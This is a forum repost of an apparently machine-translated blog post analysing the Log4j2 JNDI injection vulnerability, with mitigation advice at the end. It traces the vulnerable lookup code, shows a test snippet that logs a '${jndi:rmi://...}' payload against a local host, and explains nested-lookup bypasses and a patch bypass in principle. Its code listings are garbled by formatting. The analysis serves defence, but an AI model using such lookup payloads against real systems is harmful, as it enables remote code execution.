Jump to content
Nytro

Speed ​​through the log4j2 JNDI injection vulnerability~

Recommended Posts

Posted

Speed through the log4j2 JNDI injection vulnerability~

 

Word count: 1.5k Reading time: 6 min
2021/12/10 932 Share

On December 9, 2021, a disaster comparable to eternal blue swept through Java. Log4j2 broke the JNDI injection vulnerability with extremely low difficulty to exploit. The difficulty of exploiting the vulnerability is breathtakingly low, and it is basically comparable to S2.

Unlike S2, Log4j2 is used by a large number of Java frameworks and applications as the basic third-party library for logging. As long as Log4j2 is used for log output and the log content can be partially controlled by the attacker, it may be vulnerable to attacks. Influence. Therefore, the vulnerability also affects a large number of common applications and components around the world, such as:
Apache Struts2
Apache Solr
Apache Druid
Apache Flink
Apache Flume
Apache Dubbo
Apache Kafka
Spring-boot-starter-log4j2
ElasticSearch
Redis
Logstash

Let's take a look at the vulnerability principle

Vulnerability analysis

Set up the environment

Here choose log4j-core 2.14.1 version, simply construct an environment

1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13
package top.bigking.log4j2attack.service;


import lombok. extern .slf4j.Slf4j;

@Slf4j 
public  class  HelloService { public static void main ( String [] args) 
{         
System.setProperty( "com.sun.jndi.rmi.object.trustURLCodebase" , "true" );         
System.setProperty( "com.sun.jndi .ldap.object.trustURLCodebase" , "true" ); 
log .error( "${jndi:rmi://127.0.0.1:1099/ruwsfb}" );     } }
        


        


spring-boot needs to turn off the original log and add log4j (this is a common usage)

1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15
< dependency > < groupId > org.springframework.boot </ groupId > < artifactId > 
spring-boot-starter </ artifactId > < exclusions > 
<!-- Remove springboot default configuration--> < exclusion > 
< groupId > org.springframework .boot </ groupId > < artifactId > 
spring-boot-starter-logging </ artifactId > </ exclusion > </ exclusions > </
    
    
    
        
            
            
        
    
dependency >

< dependency >  <!-- Introduce log4j2 dependency--> < groupId > org.springframework.boot </ groupId > 
< artifactId > spring-boot-starter-log4j2 </ artifactId > </ dependency >
    
    

Execute to trigger
20211210173223.png

Code analysis

Causes of Vulnerability

Here we follow the error normally
20211210173341.png

First of all, you can see isEnabledthe verification here . This is also the reason why many friends' info functions cannot be triggered. If the configuration is not met, the log will not be recorded.

MessagePatternConverterThe formatfunction followed all the way here
20211210173351.png

You can see the entrance of this vulnerability, if the code exists, ${it will enter additional processing. Continue to follow to StrSubstitutorthe substitutefunction
20211210173359.png

Here is the main part of the vulnerability, basically the grammatical content in the recursive processing, and some built-in grammar

prefixMatcherYes ${
suffixMatcherYes}

Only when the two parts are searched will it enter the grammar processing
20211210173409.png

The content between the brackets is passed to varname

And carry out two built-in grammars, of which

1 
2 
3 
4
public  static  Final  String DEFAULT_VALUE_DELIMITER_STRING = ": -" ; 
public  static  Final StrMatcher DEFAULT_VALUE_DELIMITER = StrMatcher.stringMatcher ( ": -" ); 
public  static  Final  String ESCAPE_DELIMITER_STRING = ": \\ -" ; 
public  static  Final StrMatcher DEFAULT_VALUE_ESCAPE_DELIMITER StrMatcher.stringMatcher = ( ":\\-" );

20211210173420.png

If these two grammars are matched, varname will be modified to the corresponding part of the corresponding grammar (important bypass)

The processed variable will enter the resolveVariablefunction on line 418
20211210173431.png

And resolveVariablehere, enter the corresponding lookup directly according to different protocols, which jndi.lookupwill cause loopholes
20211210173439.png

If the execution of the lookup returns, it will enter the next level of recursive processing on line 427
20211210173446.png

There are also many protocols supported by lookup
20211210173452.png

include{date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j}

If you can smoothly step down from this process, it is not difficult to find that there are actually many logical problems in the entire process.

Some simple bypasses

Previously, we ${jndi:rmi://127.0.0.1:1099/ruwsfb}analyzed and processed according to the payload .

But in the code, there are many parts that explain that there is recursive processing here, that is to say, we can ${}handle the return here in a nested syntax.

For example, we select the lower protocol to return and splicing into the code
20211210173459.png

The same can be executed

Including his built-in special grammar
20211210173505.png

The first half will be treated as varname, and the second half will be returned to replace the original result for the next splicing, so that a new payload can be constructed.

Even the official has added a fault-tolerant code to it, if characters that do not meet the conditions are encountered, they will be deleted directly.
20211210173511.png

Due to some special regulations, I will not announce the relevant bypass payload here. If you understand this part of the code, you can easily construct it.

2.15.0 rc1 fix

In fact, this vulnerability was released a few days ago with an update patch, and I have also paid attention to it before, but I did not expect the logic of exploitation to be so simple.

When the entire loophole caused a storm in the entire security circle, more and more friends focused their attention here. The rc1 repair also ushered in a bypass. The bypass here is actually quite interesting. Let's take a look at the patch.

Repair patches and test samples are very interesting
20211210173517.png

To put it simply, the original repair logic processing office, think of a way to make him deal with the error, then the original catch will not do the processing, but go directly into the lookup
20211210173524.png

😆

Repair plan

1. At present, Apache officially only released 2.15.0 rc2 and packaged the 2.15.0 release. There is no guarantee that it will not be bypassed a second time, and it is said that this version is not very compatible.
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

2. Now the common repair plan mainly focuses on configuration modification
, adding configuration to the log4j2.component.properties configuration file of the project:

1
log4j2.formatMsgNoLookups = true

It should be noted that this configuration only takes effect above 2.10.0.

You can also add this configuration in the java startup item

1
-Dlog4j2.formatMsgNoLookups = true

3. In addition, you may have to rely on major WAFs

Write at the end

In fact, this vulnerability was patched on December 6, and it was widely spread on Twitter. The first reaction I saw at first was that it was impossible to have such a serious problem. It must be a lot of restrictions. As a result, the use is simply very simple, and it swept all the projects in the java class at once.

As a basic component, this component is referenced by most java frameworks/java applications, and a large number of problems are exposed at once. Just 1 hour after get off work, the payload has been spread. If it weren’t for the use of jndi to rce, it’s not easy. It is estimated that many services have fallen overnight.

Since the manufacturer has not had time to release the repaired release, this vulnerability can only be defended by waf in the early stage. If the manufacturer with poor security operation construction, it is estimated that they can only wait to die. This feeling may be difficult to feel without experiencing such a big hole. . (When will 360 rise?

  • Thanks 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...